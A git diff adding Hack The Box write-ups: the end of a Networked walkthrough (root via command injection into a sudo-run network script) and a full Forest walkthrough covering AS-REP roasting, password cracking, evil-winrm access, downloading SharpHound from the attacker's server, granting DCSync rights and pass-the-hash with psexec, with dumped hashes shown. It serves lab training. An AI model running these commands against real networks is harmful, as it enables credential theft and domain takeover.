+ env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
+ env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
+ env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
+ secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
+
+ User guly may run the following commands on networked:
+ (root) NOPASSWD: /usr/local/sbin/changename.sh
+
+ [guly@networked ~]$ ls -la /usr/local/sbin/changename.sh
+ ls -la /usr/local/sbin/changename.sh
+ -rwxr-xr-x 1 root root 422 Jul 8 2019 /usr/local/sbin/changename.sh
+
+
+We see that the script changename.sh may be run as root with no password although as you can see from the result of our second command, we do not have the writing rights to it as it is owned by the root user, so let's check what it does :
+
+
+ [guly@networked ~]$ cat /usr/local/sbin/changename.sh
+ cat /usr/local/sbin/changename.sh
+ #!/bin/bash -p
+ cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
+ DEVICE=guly0
+ ONBOOT=no
+ NM_CONTROLLED=no
+ EoF
+
+ regexp="^[a-zA-Z0-9_\ /-]+$"
+
+ for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
+ echo "interface $var:"
+ read x
+ while [[ ! $x =~ $regexp ]]; do
+ echo "wrong input, try again"
+ echo "interface $var:"
+ read x
+ done
+ echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
+ done
+
+ /sbin/ifup guly0
+
+
+basically the vulnerability here is, that if we put a space in any of the variables, once the commands we want is being put in the config file, when the script is going to read it, it is going to execute our command for us , as root.
+
+
+ [guly@networked ~]$ sudo /usr/local/sbin/changename.sh
+ sudo /usr/local/sbin/changename.sh
+ interface NAME:
+ nihilist
+ nihilist
+ interface PROXY_METHOD:
+ nihilist
+ nihilist
+ interface BROWSER_ONLY:
+ nihilist bash
+ nihilist bash
+ interface BOOTPROTO:
+ TCP
+ TCP
+ [root@networked network-scripts]# cat /root/root.txt
+ cat /root/root.txt
+ 0aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to privesc, and print out the root flag !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/38.md b/Easy/38.md
new file mode 100644
index 0000000..3b1ec43
--- /dev/null
+++ b/Easy/38.md
@@ -0,0 +1,674 @@
+# Forest Writeup
+
+
+
+## Introduction :
+
+Forest is an easy windows box released back in October 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/27 ] [Documents/Github/void.yt]
+ → nmap -sCV 10.10.10.161
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 17:55 CEST
+ Nmap scan report for 10.10.10.161
+ Host is up (0.34s latency).
+ Not shown: 989 closed ports
+ PORT STATE SERVICE VERSION
+ 53/tcp open domain Simple DNS Plus
+ 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-24 16:10:35Z)
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
+ 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
+ 464/tcp open kpasswd5?
+ 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+ 636/tcp open tcpwrapped
+ 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
+ 3269/tcp open tcpwrapped
+ Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: 2h34m28s, deviation: 4h02m30s, median: 14m28s
+ | smb-os-discovery:
+ | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
+ | Computer name: FOREST
+ | NetBIOS computer name: FOREST\x00
+ | Domain name: htb.local
+ | Forest name: htb.local
+ | FQDN: FOREST.htb.local
+ |_ System time: 2021-05-24T09:10:39-07:00
+ | smb-security-mode:
+ | account_used:
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: required
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled and required
+ | smb2-time:
+ | date: 2021-05-24T16:10:42
+ |_ start_date: 2021-05-24T16:09:41
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 21.16 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up the RPC service, so let's run enum4linux:
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → enum4linux 10.10.10.161
+ Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 24 18:06:21 2021
+ [...]
+ user:[Administrator] rid:[0x1f4]
+ user:[Guest] rid:[0x1f5]
+ user:[krbtgt] rid:[0x1f6]
+ user:[DefaultAccount] rid:[0x1f7]
+ user:[$331000-VK4ADACQNUCA] rid:[0x463]
+ user:[SM_2c8eef0a09b545acb] rid:[0x464]
+ user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
+ user:[SM_75a538d3025e4db9a] rid:[0x466]
+ user:[SM_681f53d4942840e18] rid:[0x467]
+ user:[SM_1b41c9286325456bb] rid:[0x468]
+ user:[SM_9b69f1b9d2cc45549] rid:[0x469]
+ user:[SM_7c96b981967141ebb] rid:[0x46a]
+ user:[SM_c75ee099d0a64c91b] rid:[0x46b]
+ user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
+ user:[HealthMailboxc3d7722] rid:[0x46e]
+ user:[HealthMailboxfc9daad] rid:[0x46f]
+ user:[HealthMailboxc0a90c9] rid:[0x470]
+ user:[HealthMailbox670628e] rid:[0x471]
+ user:[HealthMailbox968e74d] rid:[0x472]
+ user:[HealthMailbox6ded678] rid:[0x473]
+ user:[HealthMailbox83d6781] rid:[0x474]
+ user:[HealthMailboxfd87238] rid:[0x475]
+ user:[HealthMailboxb01ac64] rid:[0x476]
+ user:[HealthMailbox7108a4e] rid:[0x477]
+ user:[HealthMailbox0659cc1] rid:[0x478]
+ user:[sebastien] rid:[0x479]
+ user:[lucinda] rid:[0x47a]
+ user:[svc-alfresco] rid:[0x47b]
+ user:[andy] rid:[0x47e]
+ user:[mark] rid:[0x47f]
+ user:[santi] rid:[0x480]
+ [...]
+
+
+
+Now we got a list of users through the RPC client because the NULL sessions are allowed. The svc-alfresco is most likely a service account, so let's bruteforce his hash using GetNPUsers.py:
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → locate GetNPUsers.py
+ /usr/share/doc/python3-impacket/examples/GetNPUsers.py
+
+ [ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → cp $(locate GetNPUsers.py) .
+
+ [ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → python3 GetNPUsers.py htb.local/svc-alfresco -no-pass -dc-ip 10.10.10.161
+ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
+
+ [*] Getting TGT for svc-alfresco
+ $krb5asrep$23$svc-alfresco@HTB.LOCAL:89d4b785e7c6fc54c5c43fcaa3cb5065$72428ed743715742a137061f08baed2741d3b13fa9e7d5139ad362374207de52ceea2d1c4c6c851ec3f5418e9770fbd7ee9e4a98be09e5fdbdd3c2adc308df47be4e45ed86d7dac2af93fffeba10958f5f9993074ced0856a5b7bda28b5429eef42f401335dbed30bb66cebaaf95805b04967da19640d5887b84cd7208878b802c2914bdba0705d944b5065fb05207a00ff3b1239fdc47686b7c4feee1ab5cf3b11c85d4426b099ff17af0b7b75e0cde27686a2dd0c406a9022ebc59da30b9e4413aecb46f8cdd835d5950a588b56ba671964d2f3aac364c403fc97bd8f38ff7c8ab49053cef
+
+
+
+And we got svc-alfresco's TGT which is a hash that contains the encrypted password. This is because the 'Do not require Kerberos preauthentication' is set, and svc-alfresco is not configured with pre-authentication. Next step is to bruteforce the hash itself:
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → vim hash.txt
+
+ [ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → cat hash.txt
+ $krb5asrep$23$svc-alfresco@HTB.LOCAL:89d4b785e7c6fc54c5c43fcaa3cb5065$72428ed743715742a137061f08baed2741d3b13fa9e7d5139ad362374207de52ceea2d1c4c6c851ec3f5418e9770fbd7ee9e4a98be09e5fdbdd3c2adc308df47be4e45ed86d7dac2af93fffeba10958f5f9993074ced0856a5b7bda28b5429eef42f401335dbed30bb66cebaaf95805b04967da19640d5887b84cd7208878b802c2914bdba0705d944b5065fb05207a00ff3b1239fdc47686b7c4feee1ab5cf3b11c85d4426b099ff17af0b7b75e0cde27686a2dd0c406a9022ebc59da30b9e4413aecb46f8cdd835d5950a588b56ba671964d2f3aac364c403fc97bd8f38ff7c8ab49053cef
+
+ [ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → john -w=/usr/share/wordlists/rockyou.txt hash.txt
+ [...]
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
+ [...]
+
+
+
+And now that we have alfresco's password, let's use evil-winrm to login:
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → sudo gem install evil-winrm
+ Fetching nori-2.6.0.gem
+ Fetching rubyntlm-0.6.3.gem
+ Fetching multi_json-1.15.0.gem
+ Fetching little-plugger-1.1.4.gem
+ Fetching gyoku-1.3.1.gem
+ Fetching logging-2.3.0.gem
+ Fetching httpclient-2.8.3.gem
+ Fetching builder-3.2.4.gem
+ Fetching gssapi-1.3.1.gem
+ Fetching evil-winrm-2.4.gem
+ Fetching winrm-2.3.6.gem
+ Fetching winrm-fs-1.3.5.gem
+ Fetching erubi-1.10.0.gem
+ Successfully installed rubyntlm-0.6.3
+ Successfully installed nori-2.6.0
+ Successfully installed multi_json-1.15.0
+ Successfully installed little-plugger-1.1.4
+ Successfully installed logging-2.3.0
+ Successfully installed httpclient-2.8.3
+ Successfully installed builder-3.2.4
+ Successfully installed gyoku-1.3.1
+ Successfully installed gssapi-1.3.1
+ Successfully installed erubi-1.10.0
+ Successfully installed winrm-2.3.6
+ Successfully installed winrm-fs-1.3.5
+ Happy hacking! :)
+ Successfully installed evil-winrm-2.4
+ [...]
+
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> sysinfo
+ The term 'sysinfo' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
+ At line:1 char:1
+ + sysinfo
+ + ~~~~~~~
+ + CategoryInfo : ObjectNotFound: (sysinfo:String) [], CommandNotFoundException
+ + FullyQualifiedErrorId : CommandNotFoundException
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> systeminfo
+ Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1
+ + systeminfo
+ + ~~~~~~~~~~.
+ At line:1 char:1
+ + systeminfo
+ + ~~~~~~~~~~
+ + CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ + FullyQualifiedErrorId : NativeCommandFailed
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
+ *Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
+ e5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get to the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now let's check the users on this machine:
+
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net users
+
+ User accounts for \\
+
+ -------------------------------------------------------------------------------
+ $331000-VK4ADACQNUCA Administrator andy
+ DefaultAccount Guest HealthMailbox0659cc1
+ HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e
+ HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64
+ HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad
+ HealthMailboxfd87238 krbtgt lucinda
+ mark santi sebastien
+ SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb
+ SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb
+ SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b
+ svc-alfresco
+ The command completed with one or more errors.
+
+
+Now here we need to do some AD recon, and we're going to use BloodHound
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → sudo apt install bloodhound -y
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → bloodhound
+
+
+` 
+
+Here we see that we need to connect to the neo4j database, so let's start it up with sudo privileges:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/28 ] [~/HTB/Forest]
+ → sudo neo4j console
+ [sudo] password for nothing:
+ Directories in use:
+ home: /usr/share/neo4j
+ config: /usr/share/neo4j/conf
+ logs: /usr/share/neo4j/logs
+ plugins: /usr/share/neo4j/plugins
+ import: /usr/share/neo4j/import
+ data: /usr/share/neo4j/data
+ certificates: /usr/share/neo4j/certificates
+ run: /usr/share/neo4j/run
+ Starting Neo4j.
+ WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
+ 2021-05-24 16:45:38.529+0000 INFO Starting...
+ 2021-05-24 16:45:40.163+0000 INFO ======== Neo4j 4.2.1 ========
+ 2021-05-24 16:45:41.980+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
+ 2021-05-24 16:45:41.985+0000 INFO Setting up initial user from defaults: neo4j
+ 2021-05-24 16:45:41.986+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
+ 2021-05-24 16:45:42.003+0000 INFO Setting version for 'security-users' to 2
+ 2021-05-24 16:45:42.009+0000 INFO After initialization of system graph model component 'security-users' have version 2 and status CURRENT
+ 2021-05-24 16:45:42.015+0000 INFO Performing postInitialization step for component 'security-users' with version 2 and status CURRENT
+ 2021-05-24 16:45:42.697+0000 INFO Bolt enabled on localhost:7687.
+ 2021-05-24 16:45:43.379+0000 INFO Remote interface available at http://localhost:7474/
+ 2021-05-24 16:45:43.380+0000 INFO Started.
+
+
+
+Now let's log into it with the default credentials **neo4j:neo4j** :
+
+
+
+More precisely, we're going to use the Bloodhound Ingestor to collect the Active Directory Data:
+
+ 
+
+Once you've set the new password, simply login:
+
+
+
+Once you've logged in to bloodhound, we're going to use SharpHound.ps1 in order to find the AD Administrators, to do so we're going to make use of our Evil-WinRM session:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
+ → sudo updatedb
+ [sudo] password for nothing:
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
+ → locate SharpHound.ps1
+ /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
+ /usr/share/metasploit-framework/data/post/powershell/SharpHound.ps1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
+ → cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 .
+
+ [ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → ls -lash SharpHound.ps1
+ 952K -rw-r--r-- 1 nothing nothing 952K May 24 18:57 SharpHound.ps1
+
+ [ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
+
+
+Now here we need to upload SharpHound.ps1:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
+ → sudo python3 -m http.server 80
+ Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
+
+
+
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> iwr -uri "http://10.10.14.13/SharpHound.ps1" -outfile "sharp.ps1"
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
+
+
+ Directory: C:\Users\svc-alfresco\Documents
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 5/24/2021 10:24 AM 974235 sharp.ps1
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . ./sharp.ps1
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> invoke-bloodhound -CollectionMethod All
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
+
+
+ Directory: C:\Users\svc-alfresco\Documents
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 5/24/2021 10:41 AM 15196 20210524104146_BloodHound.zip
+ -a---- 5/24/2021 10:41 AM 23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
+ -a---- 5/24/2021 10:24 AM 974235 sharp.ps1
+
+
+
+Once we run sharp.ps1 we get a zip file, so let's copy it back to our kali machine, to do so we can use evil-winrm's built-in download function:
+
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20210524104146_BloodHound.zip
+ Info: Downloading C:\Users\svc-alfresco\Documents\20210524104146_BloodHound.zip to 20210524104146_BloodHound.zip
+
+
+ Info: Download successful!
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> exit
+
+ Info: Exiting with code 0
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → ls -lashg 20210524104146_BloodHound.zip
+ 16K -rw-r--r-- 1 nothing 15K May 24 19:39 20210524104146_BloodHound.zip
+
+ [ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → ls -lash 20210524104146_BloodHound.zip
+ 16K -rw-r--r-- 1 nothing nothing 15K May 24 19:39 20210524104146_BloodHound.zip
+
+
+
+Now that we got the zip file locally, let's load it in bloodhound:
+
+ 
+
+So here we finally see what's going on, and we can find the shortest path to domain admin:
+
+
+
+svc-alfresco has **GenericAll** rights on the **Exchange Windows Permissions** group, so we can add this user to the group, next the WriteDacl rights allows us to give DCsync rights to our compromised user, and retrieve the NTLM hashes for all users on the domain. To exploit the ACL path automatically we can use [aclpwn](https://github.com/fox-it/aclpwn.py):
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → pip install aclpwn
+ Collecting aclpwn
+ Downloading aclpwn-1.0.0-py3-none-any.whl (17 kB)
+ Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from aclpwn) (2.25.1)
+ Requirement already satisfied: ldap3>=2.5 in /usr/lib/python3/dist-packages (from aclpwn) (2.8.1)
+ Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from aclpwn) (0.9.22)
+ Collecting neo4j-driver
+ Downloading neo4j-driver-4.2.1.tar.gz (69 kB)
+ |████████████████████████████████| 69 kB 1.6 MB/s
+ Requirement already satisfied: pytz in /usr/lib/python3/dist-packages (from neo4j-driver->aclpwn) (2021.1)
+ Building wheels for collected packages: neo4j-driver
+ Building wheel for neo4j-driver (setup.py) ... done
+ Created wheel for neo4j-driver: filename=neo4j_driver-4.2.1-py3-none-any.whl size=95273 sha256=2b8a5fca03df766fe46cfdcd83ef272170de7f3d1000c49c114ae78bd4efeea1
+ Stored in directory: /home/nothing/.cache/pip/wheels/fe/a2/12/36d9ab6287417260db156b6021d409f296d274a11f23373cfe
+ Successfully built neo4j-driver
+ Installing collected packages: neo4j-driver, aclpwn
+ WARNING: The script aclpwn is installed in '/home/nothing/.local/bin' which is not on PATH.
+ Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
+ Successfully installed aclpwn-1.0.0 neo4j-driver-4.2.1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → PATH=$PATH:/home/nothing/.local/bin
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
+ → aclpwn -f svc-alfresco -ft user -t htb.local -tt domain -d htb.local -dp bloodhound -du neo4j --server 10.10.10.161 -u svc-alfresco -sp s3rvice -p s3rvice
+
+
+So you can use that, or you can also just do it manually as follows:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Forest]
+ → evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" svc-alfresco /add /domain
+ The command completed successfully.
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user svc-alfresco
+ User name svc-alfresco
+ Full Name svc-alfresco
+ Comment
+ User's comment
+ Country/region code 000 (System Default)
+ Account active Yes
+ Account expires Never
+
+ Password last set 5/24/2021 11:15:40 AM
+ Password expires Never
+ Password changeable 5/25/2021 11:15:40 AM
+ Password required Yes
+ User may change password Yes
+
+ Workstations allowed All
+ Logon script
+ User profile
+ Home directory
+ Last logon 5/24/2021 9:27:15 AM
+
+ Logon hours allowed All
+
+ Local Group Memberships
+ Global Group memberships *Exchange Windows Perm*Domain Users
+ *Service Accounts
+ The command completed successfully.
+
+
+So here we added alfresco to the **Exchange Windows Permissions @HTB.LOCAL** , next step is to grant alfresco **DcSync privileges** using [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
+
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring 's3rvice' -AsPlainText -Force
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $pass)
+
+
+Obviously we need PowerView.ps1 so let's first copy it to our local directory where we started the Evil-WinRM session:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
+ → locate PowerView.ps1
+ /usr/lib/python3/dist-packages/cme/data/powersploit/Recon/PowerView.ps1
+ /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
+
+
+
+Be careful, these are outdated PowerView.ps1 files, you need to get the most recent one:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
+ → wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -O PowerView.ps1
+ --2021-05-24 20:16:08-- https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.108.133, 185.199.110.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 770279 (752K) [text/plain]
+ Saving to: ‘PowerView.ps1’
+
+ PowerView.ps1 100%[===================================================================================================================================================>] 752.23K 3.25MB/s in 0.2s
+
+ 2021-05-24 20:16:08 (3.25 MB/s) - ‘PowerView.ps1’ saved [770279/770279]
+
+
+
+Now we upload PowerView to the machine:
+
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
+ Info: Uploading PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
+
+
+ Data: 1027036 bytes of 1027036 bytes copied
+
+ Info: Upload successful!
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
+
+
+ Directory: C:\Users\svc-alfresco\Documents
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 5/24/2021 10:41 AM 15196 20210524104146_BloodHound.zip
+ -a---- 5/24/2021 10:41 AM 23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
+ -a---- 5/24/2021 11:31 AM 770279 PowerView.ps1
+ -a---- 5/24/2021 10:24 AM 974235 sharp.ps1
+
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> remove-module PowerView
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> import-module .\PowerView.ps1
+
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring 's3rvice' -AsPlainText -Force
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $pass)
+ *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity "svc-alfresco" -Rights DCSync
+
+
+
+And from there we can use secretsdump.py to get the hashes of all users using DcSync:
+
+
+ secretsdump.py svc-alfresco:s3rvice@10.10.10.161
+ Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
+
+ [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
+ [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
+ [*] Using the DRSUAPI method to get NTDS.DIT secrets
+ htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
+ Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+ krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
+ DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+
+ [...]
+
+ [*] Cleaning up...
+
+
+And finally we simply use the Admin hash with psexec.py, if you don't have it yet, install it as follows:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
+ → git clone https://github.com/SecureAuthCorp/impacket.git
+ Cloning into 'impacket'...
+ remote: Enumerating objects: 19239, done.
+ remote: Counting objects: 100% (339/339), done.
+ remote: Compressing objects: 100% (205/205), done.
+ remote: Total 19239 (delta 193), reused 232 (delta 133), pack-reused 18900
+ Receiving objects: 100% (19239/19239), 6.61 MiB | 4.26 MiB/s, done.
+ Resolving deltas: 100% (14585/14585), done.
+
+ [ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
+ → cd impacket
+
+ [ 10.10.14.13/23 ] [ /dev/pts/30 ] [HTB/Forest/impacket]
+ → sudo pip3 install .
+ [sudo] password for nothing:
+ Processing /home/nothing/HTB/Forest/impacket
+ Requirement already satisfied: chardet in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (4.0.0)
+ Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (1.1.2)
+ Requirement already satisfied: future in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (0.18.2)
+ Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (2.8.1)
+ Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (0.9.3)
+ Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (20.0.1)
+ Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (0.4.8)
+ Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (3.9.7)
+ Requirement already satisfied: six in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (1.16.0)
+ Building wheels for collected packages: impacket
+ Building wheel for impacket (setup.py) ... done
+ Created wheel for impacket: filename=impacket-0.9.23.dev1+20210519.170900.2f5c2476-py3-none-any.whl size=1397782 sha256=39758aa69b8434256a2f79b26209d55225fecd0090950c922499e17de963a10f
+ Stored in directory: /tmp/pip-ephem-wheel-cache-ln48imhy/wheels/7a/85/ca/606ceaff4c6e06dc108bb711bd0c0de17bc79b379a138a14c9
+ Successfully built impacket
+ Installing collected packages: impacket
+ Attempting uninstall: impacket
+ Found existing installation: impacket 0.9.22
+ Not uninstalling impacket at /usr/lib/python3/dist-packages, outside environment /usr
+ Can't uninstall 'impacket'. No files were found to uninstall.
+ Successfully installed impacket-0.9.23.dev1+20210519.170900.2f5c2476
+
+ [ 10.10.14.13/23 ] [ /dev/pts/30 ] [HTB/Forest/impacket]
+ → sudo python3 setup.py install
+
+
+
+Then use it with the admin hash:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/30 ] [HTB/Forest/impacket]
+ → impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 htb.local/Administrator@10.10.10.161
